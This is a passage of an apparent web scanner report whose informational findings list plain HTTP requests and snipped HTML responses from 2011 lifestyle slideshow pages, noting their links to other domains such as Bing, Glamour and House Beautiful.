<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.glamourmag.com/?mbid=msn"><img src="http://blstb.redacted/i/57/CFFA9B69555B8E5C255A69F7F6A5.jpg" width="90" height="30" alt="Glamour" />
...[SNIP]...
<li class="first"><a href="http://www.glamour.com/sex-love-life/2008/09/10-things-hes-thinking-when-youre-naked?mbid=synd_msn">10 Things He's Thinking When You're Naked</a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2010/08/15-things-men-dont-want-you-to-know-about-them?mbid=synd_msn">15 Things Men Don't Want You to Know About Them</a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2010/11/7-ways-to-convince-any-man-youre-right?mbid=synd_msn">7 Ways to Convince Any Man You're Right</a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2009/01/his-top-10-sex-wishes-revealed?mbid=synd_msn">His Top 10 Sex Wishes Revealed</a>
...[SNIP]...
<li class="last"><a href="http://www.glamour.com/sex-love-life/2009/09/12-secret-signs-hes-into-you?mbid=synd_msn">12 Secret Signs He's Into You</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&amp;imageindex=1&amp;OCID=TWT">Tweet</a>
...[SNIP]...
ry', 'True','1');" href="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
True','0');" href="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<div class="linkedimg"><a href="https://w1.buysub.com/pubs/N3/GLM/self_bbg_redbaggwp_slf-impulse.jsp?cds_page_id=47935&amp;cds_mag_code=GLM&amp;id=1212175010742&amp;lsid=81511416507026799&amp;vid=1&amp;cds_response_key=M8ELRMSNZ&amp;cds_mag_code=GLM"><img src="http://blstb.redacted/i/22/248EF6C657B86F0A8D9A35C6438F.jpg" width="300" height="75" alt="Glamour" />
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&amp;q=">See more results</a>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&amp;go=&amp;form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&amp;form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.104. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-home/room-design/staticslideshowhb.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&gt1=32067 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=2d389eb7e7ea4ae0a473db58b1a5758b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=42164453E4924CB89C5B977561EA27D0; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344849&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-home%2Froom-design%2Fstaticslideshowhb.aspx%3Fcp-documentid%3D26867784%26gt1%3D32067&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li class="first"><a href="http://msn.delish.com/">Food &amp; Entertaining</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.housebeautiful.com?link=lgo&amp;dom=msn&amp;tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&amp;src=syn&amp;con=slide&amp;mag=hbu"><img src="http://blstb.redacted/i/36/A314E87A94101ACD9DADF33B27E6.jpg" width="90" height="30" alt="House Beautiful" />
...[SNIP]...
<li class="first"><a href="http://www.housebeautiful.com/decorating/beautiful-designer-bedrooms?link=msn%3ABeautiful%20Designer%20Bedrooms%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&amp;dom=msn&amp;tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&amp;src=syn&amp;con=slide&amp;mag=hbu">Beautiful Designer Bedrooms</a>
...[SNIP]...
<li class=""><a href="http://www.housebeautiful.com/decorating/decorating-secrets?link=msn%3A20%20Decorating%20Secrets%20No%20One%20Ever%20Told%20You%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&amp;dom=msn&amp;tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&amp;src=syn&amp;con=slide&amp;mag=hbu">20 Decorating Secrets No One Ever Told You</a>
...[SNIP]...
<li class=""><a href="http://www.housebeautiful.com/decorating/home-makeovers/101-makeover-ideas-0209?link=msn%3APopular%20Home%20Makeover%20Ideas%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&amp;dom=msn&amp;tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&amp;src=syn&amp;con=slide&amp;mag=hbu">Popular Home Makeover Ideas</a>
...[SNIP]...
<li class=""><a href="http://www.housebeautiful.com/kitchens/small-kitchens?link=msn%3A14%20Clever%20Tricks%20for%20Tiny%20Kitchens%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&amp;dom=msn&amp;tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&amp;src=syn&amp;con=slide&amp;mag=hbu">14 Clever Tricks for Tiny Kitchens</a>
...[SNIP]...
<li class="last"><a href="http://www.housebeautiful.com/video/#v180458534001?link=msn%3ATour%20the%20Kitchen%20of%20the%20Year%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&amp;dom=msn&amp;tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&amp;src=syn&amp;con=slide&amp;mag=hbu">Tour the Kitchen of the Year</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&amp;imageindex=1&amp;OCID=TWT">Tweet</a>
...[SNIP]...
<li><a href="http://www.delish.com/cooking-shows/food-tv/super-bowl-sunday-recipes-nfl">NFL Mom's High-Scoring Recipes </a>
...[SNIP]...
<div class="child c1 first"><script src="http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_HBU_585X368" type="text/javascript"></script>
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&amp;q=">See more results</a>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&amp;go=&amp;form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&amp;form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Coats</a>
...[SNIP]...
<div id="subfoot"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.105. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-home/room-design/staticslideshowhb.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&gt1=32067 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:15 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a47aede89c61466cb6943852556f27e6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=EA4FE35D24D7426BAA37AF56D0CB2642; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:15 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406215&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-home%2Froom-design%2Fstaticslideshowhb.aspx%3Fcp-documentid%3D26867784%26gt1%3D32067&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li class="first"><a href="http://msn.delish.com/">Food &amp; Entertaining</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.housebeautiful.com?link=lgo&amp;dom=msn&amp;tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&amp;src=syn&amp;con=slide&amp;mag=hbu"><img src="http://blstb.redacted/i/36/A314E87A94101ACD9DADF33B27E6.jpg" width="90" height="30" alt="House Beautiful" />
...[SNIP]...
<li class="first"><a href="http://www.housebeautiful.com/decorating/beautiful-designer-bedrooms?link=msn%3ABeautiful%20Designer%20Bedrooms%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&amp;dom=msn&amp;tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&amp;src=syn&amp;con=slide&amp;mag=hbu">Beautiful Designer Bedrooms</a>
...[SNIP]...
<li class=""><a href="http://www.housebeautiful.com/decorating/decorating-secrets?link=msn%3A20%20Decorating%20Secrets%20No%20One%20Ever%20Told%20You%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&amp;dom=msn&amp;tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&amp;src=syn&amp;con=slide&amp;mag=hbu">20 Decorating Secrets No One Ever Told You</a>
...[SNIP]...
<li class=""><a href="http://www.housebeautiful.com/decorating/home-makeovers/101-makeover-ideas-0209?link=msn%3APopular%20Home%20Makeover%20Ideas%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&amp;dom=msn&amp;tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&amp;src=syn&amp;con=slide&amp;mag=hbu">Popular Home Makeover Ideas</a>
...[SNIP]...
<li class=""><a href="http://www.housebeautiful.com/kitchens/small-kitchens?link=msn%3A14%20Clever%20Tricks%20for%20Tiny%20Kitchens%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&amp;dom=msn&amp;tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&amp;src=syn&amp;con=slide&amp;mag=hbu">14 Clever Tricks for Tiny Kitchens</a>
...[SNIP]...
<li class="last"><a href="http://www.housebeautiful.com/video/#v180458534001?link=msn%3ATour%20the%20Kitchen%20of%20the%20Year%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&amp;dom=msn&amp;tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&amp;src=syn&amp;con=slide&amp;mag=hbu">Tour the Kitchen of the Year</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&amp;imageindex=1&amp;OCID=TWT">Tweet</a>
...[SNIP]...
<li><a href="http://www.delish.com/cooking-shows/food-tv/super-bowl-sunday-recipes-nfl">NFL Mom's High-Scoring Recipes </a>
...[SNIP]...
<div class="child c1 first"><script src="http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_HBU_585X368" type="text/javascript"></script>
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&amp;q=">See more results</a>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&amp;go=&amp;form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
